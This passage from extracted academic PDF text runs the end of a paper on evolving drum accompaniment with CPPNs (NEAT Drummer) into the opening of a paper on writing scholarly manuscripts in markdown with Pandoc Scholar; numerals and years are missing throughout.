recurrent networks to scaffolded cppns in sec- tion yield interesting insight into the capabilities and limitations of recurrent neural networks applied to generating musical accompaniment. in particular, recurrent anns do produce complex motifs, but it is difficult to synchronize them to musical structure. while a cppn with a position-in-measure conduc- tor can right away produce patterns that respect measures, it takes hundreds of generations to achieve the same with recurrent networks, which is too long for a human performing interactive evolution. this result raises the question of whether it is biologically realistic in connec- tionist models of music generation to rely upon recurrence as the main mecha- nism of musical encoding. it is also plausible that the brain stores music in part as simple functions that are layered and composed one upon another. it is no- table that evolving a recurrent network (figure b) and a feedforward network that is a function of both position-in-song and position-in-measure (figure ) produced results of similar quality. thus the question remains open whether the best infrastructure for generating temporal patterns is recurrence, or whether it is two simple timing signals upon which feedforward functions can be built. it may also be a combination of the two. conclusion this paper argued that the reason human musicians can improvise and com- pose vast and complex accompaniments almost instantaneously is that they are in effect generating a simple function that relates one instrument’s part to an- other’s. this idea was implemented in a program called neat drummer that generates novel drum tracks for existing midi songs. furthermore, the idea of a conductor, i.e. a simple hidden function that affects the overall pattern of music, was introduced. the results demonstrated the viability of this model of musical creativity, producing drum tracks that tightly follow the contours of real songs yet still produce nontrivial accompaniment. the conductors seamlessly introduced variational motifs over and above those already in the existing song structure, creating a new way for humans with little musical expertise to control the overall structure of a song. the main conclusion is that a significant portion of musical creativity may be explained by the functional relationships between the different parts of a song. acknowledgments special thanks to michael rosario for his prior work at the university of central florida creating the software infrastructure for neat drummer. special thanks also to barry taylor for granting special permission to utilize his own midi productions of folk music in this work. barry taylor originally sequenced johnny cope, oh! susanna, and oh! dem golden slippers (all without percussion), which are the three songs for which drum tracks were generated in sections and . this research was supported in part by nsf grants iis-reu: and iis-reu . references barrett, f. j. ( ). coda: creativity and improvisation in jazz and orga- nizations: implications for organizational learning. organization science, ( ): – . special issue: jazz improvisation and organizing. berliner, p. f. ( ). thinking in jazz: the infinite art of improvisation. (cse) chicago studies in ethnomusicology. the university of chicago press, chicago. biles, j. a. ( ). life with genjam: interacting with a musical iga, systems, man, and cybernetics. in ieee international conference on systems, man, and cybernetics, pages – . biles, j. a. ( ). evolutionary computation for musical tasks. in miranda, e. r. and biles, j. a., editors, evolutionary computer music, chapter , pages – . springer-verlag new york, inc., secaucus, nj, usa. chen, c.-c. and miikkulainen, r. ( ). creating melodies with evolving recurrent neural networks. in proceedings of the inns-ieee international joint conference on neural networks, pages – . dawkins, r. ( ). the blind watchmaker. longman, essex, u.k. de mantaras, r. l. and arcos, j. l. ( ). ai and music from composition to expressive performance. ai mag., ( ): – . deutsch, o. e. ( ). mozart: a documentary biography. standford univer- sity press, standford, california. . dolson, m. ( ). machine tongues xii: neural networks. computer music journal, ( ): – . furuta, h., maeda, k., and e.watanabe ( ). application of genetic algo- rithm to aesthetic design of bridge structures. microcomput. civil eng, ( ): – . gomez, f. and miikkulainen, r. ( ). solving non-markovian control tasks with neuroevolution. in ijcai- , pages – , kauf-addr. kauf. husbands, p., copley, p., eldridge, a., and mandelis, j. ( ). an introduction to evolutionary computing for musicians. in miranda, e. r. and biles, j. a., editors, evolutionary computer music, chapter , pages – . springer- verlag new york, inc., secaucus, nj, usa. hymer, s. ( ). on inspiration. in stern, e. m., editor, psychotherapy and the widowed patient. the haworth press, inc., new rochelle, new york. johanson, b. and poli, r. ( ). gp-music: an interactive genetic program- ming system for music generation with automated fitness raters. in pro- ceedings of the third annual conference: genetic programming, pages – . katz, p. and longden, s. ( ). the jam session: a study of spontaneous group process. in middleman, r., editor, activities and action in groupwork, chapter , pages – . the haworth press, inc, binghamton, ny. kuriyama, k. and terano, t. ( ). interactive story composition support by genetic algorithms. in world conf. artificial intelligence in education, page , kobe, japan. lindenmayer, a. ( ). mathematical models for cellular interaction in de- velopment parts i and ii. journal of theoretical biology, : – and – . mccormack, j. ( ). open problems in evolutionary music and art. in pro- ceedings of applications of evolutionary computing, (evomusart ), volume of lecture notes in computer science, pages – , berlin, germany. springer verlag. nelson, g. l. ( ). sonomorphs: an application of genetic algorithms to growth and development of musical organisms. in th biennial art and technology symp., pages – . oliver, m. ( ). on inspiration. contemporary music review, ( / ): – . onisawa, t., takizawa, w., and unehara, m. ( ). composition of melody reflecting users feeling. ieee int. conf. industrial electronics, control and instrumentation, page . ruppel, r. r. ( ). gottfried keller and his critics: a case study in schol- arly criticism. camden house, columbia, sc. saravanan, n. and fogel, d. b. ( ). evolving neural control systems. ieee expert, pages – . sato, t. and hagiwara, m. ( ). tool creating support system using evolution- ary techniques. faji shisutemu shinpojiumu koen ronbunshu, : . schuller, g. ( ). early jazz. oxford university pres, new york. secretan, j., beato, n., d’ambrosio, d. b., rodriguez, a., campbell, a., and stanley, k. o. ( ). picbreeder: evolving pictures collaboratively online. in chi ’ : proceeding of the twenty-sixth annual sigchi conference on human factors in computing systems, pages – , new york, ny, usa. acm. sims, k. ( ). artificial evolution for computer graphics. in proceedings of the th annual conference on computer graphics and interactive techniques (siggraph ’ ), pages – , new york, ny. acm press. stanley, k. o. ( ). exploiting regularity without development. in proceed- ings of the aaai fall symposium on developmental systems, menlo park, ca. aaai press. stanley, k. o. ( ). compositional pattern producing networks: a novel abstraction of development. genetic programming and evolvable machines special issue on developmental systems, ( ): – . stanley, k. o. and miikkulainen, r. ( ). evolving neural networks through augmenting topologies. evolutionary computation, : – . stanley, k. o. and miikkulainen, r. ( ). competitive coevolution through evolutionary complexification. jair, : – . takagi, h. ( ). interactive evolutionary computation: fusion of the capac- ities of ec optimization and human evaluation. proceedings of the ieee, ( ): – . todd, p. m. and loy, d. g. ( ). music and connectionism. mit press, cambridge, ma. todd, s. and latham, w. ( ). evolutionary art and computers. academic press, london. todd, s. and latham, w. ( ). the mutation and growth of art by comput- ers, chapter , pages – . morgan kaufmann, san mateo, california. tokui, n. and iba, h. ( ). music composition with interactive evolutionary computation. in third international conference on generative art, pages – , milan italy. weick, k. e. ( ). introductory essay: improvisation as a mindset for organi- zational analysis. organization science, ( ): – . special issue: jazz improvisation and organizing. yao, x. ( ). evolving artificial neural networks. proceedings of the ieee, ( ): – . submitted december accepted april published may corresponding author robert winkler, robert.winkler@cinvestav.mx academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright krewinkel and winkler distributed under creative commons cc-by . open access formatting open science: agilely creating multiple document formats for academic manuscripts with pandoc scholar albert krewinkel and robert winkler pandoc development team, berlin, germany department of biotechnology and biochemistry, cinvestav unidad irapuato, mexico abstract the timely publication of scientific results is essential for dynamic advances in science. the ubiquitous availability of computers which are connected to a global network made the rapid and low-cost distribution of information through electronic channels possible. new concepts, such as open access publishing and preprint servers are currently changing the traditional print media business towards a community-driven peer production. however, the cost of scientific literature generation, which is either charged to readers, authors or sponsors, is still high. the main active participants in the authoring and evaluation of scientific manuscripts are volunteers, and the cost for online publishing infrastructure is close to negligible. a major time and cost factor is the formatting of manuscripts in the production stage. in this article we demonstrate the feasibility of writing scientific manuscripts in plain markdown (md) text files, which can be easily converted into common publication formats, such as pdf, html or epub, using pandoc. the simple syntax of markdown assures the long-term readability of raw files and the development of software and workflows. we show the implementation of typical elements of scientific manuscripts—formulas, tables, code blocks and citations—and present tools for editing, collaborative writing and version control. we give an example on how to prepare a manuscript with distinct output formats, a docx file for submission to a journal, and a latex/pdf version for deposition as a peerj preprint. further, we implemented new features for supporting ‘semantic web’ applications, such as the ‘journal article tag suite’— jats, and the ‘citation typing ontology’—cito standard. reducing the work spent on manuscript formatting translates directly to time and cost savings for writers, publishers, readers and sponsors. therefore, the adoption of the md format contributes to the agile production of open science literature. pandoc scholar is freely available from https://github.com/pandoc-scholar. subjects human–computer interaction, computer education, computer networks and communications, digital libraries, world wide web and web science keywords open science, markdown, latex, publishing, typesetting, document formats introduction agile development of science depends on the continuous exchange of information between researchers (woelfle, olliaro & todd, ). in the past, physical copies of scientific works had to be produced and distributed. therefore, publishers needed to invest considerable how to cite this article krewinkel and winkler ( ), formatting open science: agilely creating multiple document formats for aca- demic manuscripts with pandoc scholar. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:robert.winkler@cinvestav.mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/pandoc-scholar http://dx.doi.org/ . /peerj-cs. resources for typesetting and printing. since the journals were mainly financed by their subscribers, their editors not only had to decide on the scientific quality of a submitted manuscript, but also on the potential interest to their readers. the availability of globally connected computers enabled the rapid exchange of information at low cost. yochai benkler ( ) predicts important changes in the information production economy, which are based on three observations: . a nonmarket motivation in areas such as education, arts, science, politics and theology. . the actual rise of nonmarket production, made possible through networked individuals and coordinate effects. . the emergence of large-scale peer production; for example, of software and encyclopedias. immaterial goods such as knowledge and culture are not lost when consumed or shared—they are ‘nonrival’—, and they enable a networked information economy, which is not commercially driven (benkler, ). preprints and e-prints in some areas of science a preprint culture, i.e., a paper-based exchange system of research ideas and results, already existed when paul ginsparg in initiated a server for the distribution of electronic preprints—‘e-prints’—about high-energy particle theory at the los alamos national laboratory (lanl), usa (ginsparg, ). later, the lanl server moved with ginsparg to cornell university, usa, and was renamed as arxiv (butler, ). currently, arxiv (https://arxiv.org/) publishes e-prints related to physics, mathematics, computer science, quantitative biology, quantitative finance and statistics. just a few years after the start of the first preprint servers, their important contribution to scientific communication was evident (ginsparg, ; youngen, ; brown, ). in , arxiv reached the impressive number of million e-prints (van noorden, ). in more conservative areas, such as chemistry and biology, accepting the publishing prior peer-review took more time (brown, ). a preprint server for life sciences (http://biorxiv.org/) was launched by the cold spring habor laboratory, usa, in (callaway, ). peerj preprints (https://peerj.com/preprints/), started in the same year, accepts manuscripts from biological sciences, medical sciences, health sciences and computer sciences. the terms ‘preprints’ and ‘e-prints’ are used synonymously, since the physical distribution of preprints has become obsolete. a major drawback of preprint publishing are the sometimes restrictive policies of scientific publishers. the sherpa/romeo project informs about copyright policies and self-archiving options of individual publishers (http://www.sherpa.ac.uk/romeo/). open access the term ‘open access’ (oa) was introduced by the budapest open access initiative and was defined as: ‘‘barrier-free access to online works and other resources. oa literature is digital, online, free of charge (gratis oa), and free of needless copyright and licensing restrictions (libre oa).’’ (suber, ) krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://arxiv.org/ http://biorxiv.org/ https://peerj.com/preprints/ http://www.sherpa.ac.uk/romeo/ http://dx.doi.org/ . /peerj-cs. frustrated by the difficulty to access even digitized scientific literature, three scientists founded the public library of science (plos). in , plos biology was published as the first fully open access journal for biology (brown, eisen & varmus, ; eisen, ). thanks to the great success of oa publishing, many conventional print publishers now offer a so-called ‘open access option’, i.e., to make accepted articles free to read for an addi- tional payment by the authors. the copyright in these hybrid models might remain with the publisher, whilst fully oa usually provide a liberal license, such as the creative commons attribution . international (cc by . , https://creativecommons.org/licenses/by/ . /). oa literature is only one component of a more general open philosophy, which also includes the access to scholarships, software, and data (willinsky, ). interestingly, there are several different ‘schools of thought’ on how to understand and define open science, as well the position that any science is open by definition, because of its objective to make generated knowledge public (fecher & friesike, ). cost of journal article production in a recent study, the article processing charges (apcs) for research intensive universities in the usa and canada were estimated to be about , usd for fully oa journals and , usd for hybrid oa journals (solomon & björk, ). peerj (https://peerj.com/), an oa journal for biological and computer sciences launched in , drastically reduced the publishing cost, offering its members a life-time publishing plan for a small registration fee (van noorden, ); alternatively the authors can choose to pay an apc of $ , usd, which may be cheaper, if multiple co-authors participate. examples such as the journal of statistical software (jss, https://www.jstatsoft.org/) and elife (https://elifesciences.org/) demonstrate the possibility of completely community- supported oa publications. figure compares the apcs of different oa publishing business models. jss and elife are peer-reviewed and indexed by thomson reuters. both journals are located in the q quality quartile in all their registered subject categories of the scimago journal & country rank (http://www.scimagojr.com/), demonstrating that high-quality publications can be produced without charging the scientific authors or readers. in , a study was carried out concerning the ‘‘economic implications of alternative scholarly publishing models’’, which demonstrates an overall societal benefit by using oa publishing models (houghton et al., ). in the same report, the real publication costs are evaluated. the relative costs of an article for the publisher are presented in fig. . conventional publishers justify their high subscription or apc prices with the added value; for example, journalism (stated in the graphics as ‘non-article processing’). however, stakeholder profits, which could be as high as %, also must be considered, and are withdrawn from the science budget (van noorden, ). generally, the production costs of an article could be roughly divided into commercial and academic/technical costs (fig. ). for nonmarket production, the commercial costs such as margins/profits, management etc. can be drastically reduced. hardware and services for hosting an editorial system, such as open journal systems of the public knowledge project (https://pkp.sfu.ca/ojs/) can be provided by public institutions. employed scholars krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://creativecommons.org/licenses/by/ . / https://peerj.com/ https://www.jstatsoft.org/ https://elifesciences.org/ http://www.scimagojr.com/ https://pkp.sfu.ca/ojs/ http://dx.doi.org/ . /peerj-cs. figure article processing charge (apcs) that authors have to pay for with different open access (oa) publishing models. data from solomon & björk ( ) and journal web-pages. figure estimated publishing cost for a ‘hybrid’ journal (conventional with open access option). data from houghton et al. ( ). can perform editor and reviewer activities without additional cost for the journals. nevertheless, ‘article processing’, which includes the manuscript handling during peer review and production represents the most expensive part. therefore, we investigated a strategy for the efficient formatting of scientific manuscripts. current standard publishing formats generally speaking, a scientific manuscript is composed of contents and formatting. while the content, i.e., text, figures, tables, citations etc., may remain the same between different publishing forms and journal styles, the formatting can be very different. most publishers require the formatting of submitted manuscripts in a certain format. ignoring this guide krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table current standard formats for scientific publishing. type description use syntax reference docx office open xml wysiwyg editing xml, zip ngo ( ) odt opendocument wysiwyg editing xml, zip brauer et al. ( ) pdf portable document print replacement pdf international organization for standardizationd ( ) epub electronic publishing e-books html , zip eikebrokk, dahl & kessel ( ) jats journal article tag suite journal publishing xml national information standards organization ( ) latex typesetting system high-quality print tex lamport ( ) html hypertext markup websites (x)html raggett, le hors & jacobs ( ) and hickson et al. ( ) md markdown lightweight markup plain text md ovadia ( ) and leonard ( ) table examples for formatting elements and their implementations in different markup languages. element markdown latex html structure section # intro \section{intro} <h >intro</h > subsection ## history \subsection{history} <h >history</h > text style bold **text** \textbf{text} <b>text</b> italics *text* \textit{text} <i>text</i> links http link <https://arxiv.org> \usepackage{url}\url{https://arxiv.org} <a href="https://arxiv.org"></a> for authors, (for example, by submitting a manuscript with a different reference style), gives a negative impression with a journal’s editorial staff. manuscripts which are too carelessly prepared can even provoke a straight ‘desk-reject’ (volmer & stokes, ). currently doc(x), latex and/ or pdf file formats are the most frequently used formats for journal submission platforms. however, even if the content of a submitted manuscript might be accepted during the peer review ‘as is’, the format still needs to be adjusted to the particular publication style in the production stage. for the electronic distribution and archiving of scientific works, which is gaining more and more importance, additional formats (epub, (x)html, jats) need to be generated. table lists the file formats which are currently the most relevant ones for scientific publishing. although the content elements of documents, such as title, author, abstract, text, figures, tables, etc., remain the same, the syntax of the file formats is rather different. table demonstrates some simple examples of differences in different markup languages. documents with the commonly used office open xml (docx microsoft word files) and opendocument (odt libreoffice) file formats can be opened in a standard text editor after unzipping. however, content and formatting information is distributed into various folders and files. practically speaking, those file formats require the use of special word processing software. from a writer’s perspective, the use of what you see is what you get (wysiwyg) programs such as microsoft word, wps office or libreoffice might be convenient, because krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the formatting of the document is directly visible. but the complicated syntax specifications often result in problems when using different software versions and for collaborative writing. simple conversions between file formats can be difficult or impossible. in a worst-case scenario, ‘old’ files cannot be opened any more for lack of compatible software. in some parts of the scientific community therefore latex, a typesetting program in plain text format, is very popular. with latex, documents with highest typographic quality can be produced. however, the source files are cluttered with latex commands and the source text can be complicated to read. causes of compilation errors in latex are sometimes difficult to find. therefore, latex is not very user friendly, especially for casual writers or beginners. in academic publishing, it is additionally desirable to create different output formats from the same source text: • for the publishing of a book, with a print version in pdf and an electronic version in epub. • for the distribution of a seminar script, with an online version in html and a print version in pdf. • for submitting a journal manuscript for peer-review in docx, as well as a preprint version with another journal style in pdf. • for archiving and exchanging article data using the journal article tag suite (jats) (national information standards organization, ), a standardized format developed by the national library of medicine (nlm). some of the tasks can be performed with latex, but an integrated solution remains a challenge. several programs for the conversion between documents formats exist, such as the e-book library program calibre (http://calibre-ebook.com/). but the results of such conversions are often not satisfactory and require substantial manual corrections. therefore, we were looking for a solution that enables the creation of scientific manuscripts in a simple format, with the subsequent generation of multiple output formats. the need for hybrid publishing has been recognized outside of science (kielhorn, ), but the requirements specific to scientific publishing have not been addressed so far. therefore, we investigated the possibility to generate multiple publication formats from a simple manuscript source file. concepts of markdown and pandoc markdown was originally developed by john gruber in collaboration with aaron swartz, with the goal to simplify the writing of html documents (http://daringfireball.net/ projects/markdown/). instead of coding a file in html syntax, the content of a document is written in plain text and annotated with simple tags which define the formatting. subsequently, the markdown (md) files are parsed to generate the final html document. with this concept, the source file remains easily readable and the author can focus on the contents rather than formatting. despite its original focus on the web, the md format has been proven to be well suited for academic writing (ovadia, ). in particular, pandoc-flavored md (http://pandoc.org/) adds several extensions which facilitate the krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://calibre-ebook.com/ http://daringfireball.net/projects/markdown/ http://daringfireball.net/projects/markdown/ http://pandoc.org/ http://dx.doi.org/ . /peerj-cs. figure workfow for the generation of multiple document formats with pandoc. the markdown (md) file contains the manuscript text with formatting tags, and can also refer to external files such as images or reference databases. the pandoc processor converts the md file to the desired output formats. documents, citations etc. can be defined in style files or templates. authoring of academic documents and their conversion into multiple output formats. table demonstrates the simplicity of md compared to other markup languages. figure illustrates the generation of various formatted documents from a manuscript in pandoc md. some relevant functions for scientific texts are explained below in more detail. markdown editors and online editing the usability of a text editor is important for the author, either writing alone or with several co-authors. in this section we present software and strategies for different scenarios. figure summarizes various options for local or networked editing of md files. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure markdown files can be edited on local devices or on cloud drives. a local or remote git reposi- tory enables advanced advanced version control. markdown editors due to md’s simple syntax, basically any text editor is suitable for editing markdown files. the formatting tags are written in plain text and are easy to remember. therefore, the author is not distracted by looking around for layout options with the mouse. for several popular text editors, such as vim (http://www.vim.org/), gnu emacs (https://www.gnu.org/software/emacs/), atom (https://atom.io/) or geany (http://www.geany.org/), plugins provide additional functionality for markdown editing; for example, syntax highlighting, command helpers, live preview or structure browsing. various dedicated markdown editors have been published as well. many of those are cross-platform compatible, such as abricotine (http://abricotine.brrd.fr/), ghostwriter (https://github.com/wereturtle/ghostwriter) and cutemarked (https://cloose.github.io/ cutemarked/). the lightweight format is also ideal for writing on mobile devices. numerous applications are available on the app stores for android and ios systems. the programs swype and dragon (http://www.nuance.com/) facilitate the input of text on such devices by guessing words from gestures and speech recognition (dictation). figure shows the editing of a markdown file, using the cross-platform editor atom with several markdown plugins. online editing and collaborative writing storing manuscripts on network drives (the cloud) has become popular for several reasons: • protection against data loss. • synchronization of documents between several devices. • collaborative editing options. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.vim.org/ https://www.gnu.org/software/emacs/ https://atom.io/ http://www.geany.org/ http://abricotine.brrd.fr/ https://github.com/wereturtle/ghostwriter https://cloose.github.io/cutemarked/ https://cloose.github.io/cutemarked/ http://www.nuance.com/ http://dx.doi.org/ . /peerj-cs. figure document directory tree, editing window and html preview using the atom editor. markdown files on a google drive (https://drive.google.com) for instance can be edited online with stackedit (https://stackedit.io). figure demonstrates the online editing of a markdown file on an owncloud (https://owncloud.com/) installation. owncloud is an open source software platform, which allows the set-up of a file server on personal web- space. the functionality of an owncloud installation can be enhanced by installing plugins. even mathematical formulas are rendered correctly in the html live preview window of the owncloud markdown plugin (fig. ). the collaboration and authoring platform authorea (https://www.authorea.com/) also supports markdown as one of multiple possible input formats. this can be beneficial for collaborations in which one or more authors are not familiar with markdown syntax. document versioning and change control programmers, especially when working in distributed teams, rely on version control systems to manage changes of code. currently, git (https://git-scm.com/), which is also used for the development of the linux kernel, is one of the most employed software solutions for versioning. git allows the parallel work of collaborators and has an efficient merging and conflict resolution system. a git repository may be used by a single local author to keep track of changes, or by a team with a remote repository; for example, on github (https://github.com/) or bitbucket (https://bitbucket.org/). because of the plain text format of markdown, git can be used for version control and distributed writing. for krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://drive.google.com https://stackedit.io https://owncloud.com/ https://www.authorea.com/ https://git-scm.com/ https://github.com/ https://bitbucket.org/ http://dx.doi.org/ . /peerj-cs. figure direct online editing of this manuscript with live preview using the owncloud markdown editor plugin by robin appelman. the writing of the present article, the co-authors (germany and mexico) used a remote git repository on bitbucket. the plain text syntax of markdown facilitates the visualization of differences of document versions, as shown in fig. . pandoc markdown for scientific texts in the following section, we demonstrate the potential for typesetting scientific manuscripts with pandoc using examples for typical document elements, such as tables, figures, formulas, code listings and references. a brief introduction is given by dominici ( ). the complete pandoc user’s manual is available at http://pandoc.org/manual.html. tables there are several options to write tables in markdown. the most flexible alternative—which was also used for this article—are pipe tables. the contents of different cells are separated by pipe symbols (|): left | center | right | default :-----|:------:|------:|--------- lll | ccc | rrr | ddd krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://pandoc.org/manual.html http://dx.doi.org/ . /peerj-cs. figure version control and collaborative editing using a git repository on bitbucket. gives left center right default lll ccc rrr ddd the headings and the alignment of the cells are given in the first two lines. the cell width is variable. the pandoc parameter --columns=num can be used to define the length of lines in characters. if contents do not fit, they will be wrapped. complex tables (for example, tables featuring multiple headers or those containing cells spanning multiple rows or columns), are currently not representable in markdown format. however, it is possible to embed latex and html tables into the document. these format-specific tables will only be included in the output if a document of the respective format is produced. this is method can be extended to apply any kind of format-specific typographic functionality which would otherwise be unavailable in markdown syntax. figures and images images are inserted as follows: ![alt text](image location/ name) e.g., krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ![publishing costs](fig-hybrid-publishing-costs.png) the alt text is used e.g., in html output. image dimensions can be defined in braces: ![](fig-hybrid-publishing-costs.png){width= mm} as well, an identifier for the figure can be defined with #, resulting e.g., in the image attributes {#figure height= %}. a paragraph containing only an image is interpreted as a figure. the alt text is then output as the figure’s caption. symbols scientific texts often require special characters; for example, greek letters, mathematical and physical symbols, and so on. the utf- standard, developed and maintained by the unicode consortium, enables the use of characters across languages and computer platforms. the encoding is defined as rfc document of the network working group (yergeau, ) and as iso standard iso/iec : (international organization for standardization, ). specifications of unicode and code charts are provided on the unicode homepage (http://www.unicode.org/). in pandoc markdown documents, unicode characters such as ◦, α, ä, Å can be inserted directly and passed to the different output documents. the correct processing of md with utf- encoding to latex/pdf output requires the use of the --latex-engine=xelatex option and the use of an appropriate font. the times-like xits font (https://github.com/khaledhosny/xits-math), suitable for high quality typesetting of scientific texts, can be set in the latex template: \usepackage{unicode-math} \setmainfont [ extension = .otf, uprightfont = *-regular, boldfont = *-bold, italicfont = *-italic, bolditalicfont = *-bolditalic, ]{xits} \setmathfont [ extension = .otf, boldfont = *bold, ]{xits-math} to facilitate the input of specific characters, so-called mnemonics can be enabled in some editors (e.g., in atom by the character-table package). for example, the - character mnemonics ‘:u’ gives ‘ü’ (diaeresis), or ‘d*’ the greek . the possible character mnemonics and character setsare listed in rfc : http://www.faqs.org/rfcs/rfc .html (simonsen, ). krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.unicode.org/ https://github.com/khaledhosny/xits-math http://www.faqs.org/rfcs/rfc .html http://dx.doi.org/ . /peerj-cs. formulas formulas are written in latex mode using the delimiters $. for example, the formula for calculating the standard deviation s of a random sampling would be written as: $s=\sqrt{\frac{ }{n- }\sum_{i= }^n(x_i-\overline{x})^{ }}$ and gives: s= √√√√ n − n∑ i= (xi−x) with xi the individual observations, x the sample mean and n the total number of samples. pandoc parses formulas into internal structures and allows conversion into formats other than latex. this allows for format-specific formula representation and enables computational analysis of the formulas (corbí& burgos, ). code listings verbatim code blocks are indicated by three tilde symbols: ~~~ verbatim code ~~~ typesetting inline code is possible by enclosing text between back ticks. ‘inline code‘ other document elements these examples are only a short demonstration of the capacities of pandoc concerning scientific documents. for more detailed information, we refer to the official manual (http://pandoc.org/manual.html). citations and biography the efficient organization and typesetting of citations and bibliographies is crucial for academic writing. pandoc supports various strategies for managing references. for processing the citations and the creation of the bibliography, the command line parameter --filter pandoc-citeproc is used, with variables for the reference database and the bibliography style. the bibliography will be located automatically at the header # references or # bibliography. reference databases pandoc is able to process all mainstream literature database formats, such as ris, bib, etc. however, for maintaining compatibility with latex/ bibtex, the use of bib databases is recommended. the used database either can be defined in the yaml metablock of the md file (see below) or it can be passed as parameter when calling pandoc. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://pandoc.org/manual.html http://dx.doi.org/ . /peerj-cs. inserting citations for inserting a reference, the database key is given within square brackets, and indicated by an ‘@’. it is also possible to add information, such as page: [@suber_open_ ; @benkler_wealth_ , ff.] gives (suber, ; benkler, , p. ff.). styles the citation style language (csl) (http://citationstyles.org/) is used for the citations and bibliographies. this file format is supported, for example, by the reference management programs mendeley (https://www.mendeley.com/), papers (http://papersapp.com/) and zotero (https://www.zotero.org/). csl styles for particular journals can be found from the zotero style repository (https://www.zotero.org/styles). the bibliography style that pandoc should use for the target document can be chosen in the yaml block of the markdown document or can be passed in as an command line option. the latter is more recommendable, because distinct bibliography style may be used for different documents. creation of latex natbib citations for citations in scientific manuscripts written in latex, the natbib package is widely used. to create a latex output file with natbib citations, pandoc simply has to be run with the --natbib option, but without the --filter pandoc-citeproc parameter. database of cited references to share the bibliography for a certain manuscript with co-authors or the publisher’s production team, it is often desirable to generate a subset of a larger database, which only contains the cited references. if latex output was generated with the --natbib option, the compilation of the file with latex gives an aux file (in the example named md-article.aux), which subsequently can be extracted using bibtool (https://github.com/ge-ne/bibtool): ~~~ bibtool -x md-article.aux -o bibshort.bib ~~~ in this example, the article database will be called bibshort.bib. for the direct creation of an article specific bib database without using latex, we wrote a simple perl script called mdbibexport (https://github.com/robert-winkler/mdbibexport). meta information of the document bourne ( ) argues that journals should be effectively equivalent to biological databases: both provide data which can be referenced by unique identifiers like doi or, for example, gene ids. applying the semantic-web ideas of berners-lee & hendler ( ) to this domain can make this vision a reality. here we show how metadata can be specified in markdown. we propose conventions, and demonstrate their suitability to enable interlinked and semantically enriched journal articles. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://citationstyles.org/ https://www.mendeley.com/ http://papersapp.com/ https://www.zotero.org/ https://www.zotero.org/styles https://github.com/ge-ne/bibtool https://github.com/robert-winkler/mdbibexport http://dx.doi.org/ . /peerj-cs. document information such as title, authors, abstract etc. can be defined in a metadata block written in yaml syntax. yaml (‘‘yaml ain’t markup language’’, http://yaml.org/) is a data serialization standard in simple, human readable format. variables defined in the yaml section are processed by pandoc and integrated into the generated documents. the yaml metadata block is recognized by three hyphens (---) at the beginning, and three hyphens or dots (...) at the end; for example; --- title: formatting open science subtitle: agile creation of multiple document types date: - - ... the public availability of all relevant information is a central aspect of open science. analogous to article contents, data should be accessible via default tools. we believe that this principle must also be applied to article metadata. thus, we created a custom pandoc writer that emits the article’s data as json–ld (lanthaler & gütl, ), allowing for informational and navigational queries of the journal’s data with standard tools of the semantic web. the above yaml information would be output as: { "@context": { "@vocab": "http://schema.org/", "date": "datepublished", "title": "headline", "subtitle": "alternativetitle" }, "@type": "scholarlyarticle", "title": "formatting open science", "subtitle": "agile creation of multiple document types", "date": " - - " } this format allows processing of the information by standard data processing software and browsers. flexible metadata authoring we developed a method to allow writers the flexible specification of authors and their respective affiliations. author names can be given as a string, via the key of a single-element object, or explicitly as a name attribute of an object. affiliations can be specified directly as properties of the author object, or separately in the institute object. additional information, for example, email addresses or identifiers like orcid (haak et al., ), can be added as additional values: author: - john doe: krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://yaml.org/ http://dx.doi.org/ . /peerj-cs. institute: fs email: john.doe@example.com orcid: - - - institute: fs: science formatting working group jats support the journal article tag suite (jats) was developed by the national library of medicine (nlm) and standardized by ansi/niso as an archiving and exchange format of journal articles and the associated metadata (national information standards organization, ), including data of the type shown above. the pandoc-jats writer by martin fenner is a plugin usable with pandoc to produce jats-formatted output. the writer was adapted to be compatible with our metadata authoring method, allowing for simple generation of files which contain the relevant metadata. citation types writers can add information about the reason a citation is given. this might help reviewers and readers, and can simplify the search for relevant literature. we developed an extended citation syntax that integrates seamlessly into markdown and can be used to add complementary information to citations. our method is based on cito, the citation typing ontology (shotton, ), which specifies a vocabulary for the motivation when citing a resource. the type of a citations can be added to a markdown citation using @cito_property:key, where cito_property is a supported cito property, and key is the usual citation key. our tool extracts that information and includes it in the generated linked data output. a general cito property (cites) is used, if no cito property is found in a citation key. the work at hand will always be the subject of the generated semantic subject–predicate– object triples. some cito predicates cannot be used in a sensical way under this condition. focusing on author convenience, we use this fact to allow shortening of properties when sensible. for example, if authors of a biological paper include a reference to the paper describing a method which was used in their work, this relation can be described by the uses_method_in property of the cito ontology. the inverse property, provides_method_for, would always be nonsensical in this context as implied by causality. it is therefore not supported by our tool. this allows us to introduce an abbreviation (method) for the latter property, as any ambiguity has been eliminated. users of western blotting might hence write @method_in:towbin_ or even just @method:towbin_ , where towbin_ is the citation identifier of the describing paper by towbin, staehelin & gordon ( ). example: manuscript with output of docx/odt format and latex/pdf for submission to different journals scientific manuscripts have to be submitted in a format defined by the journal or publisher. at the moment, docx is the most common file format for manuscript submission. some krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / 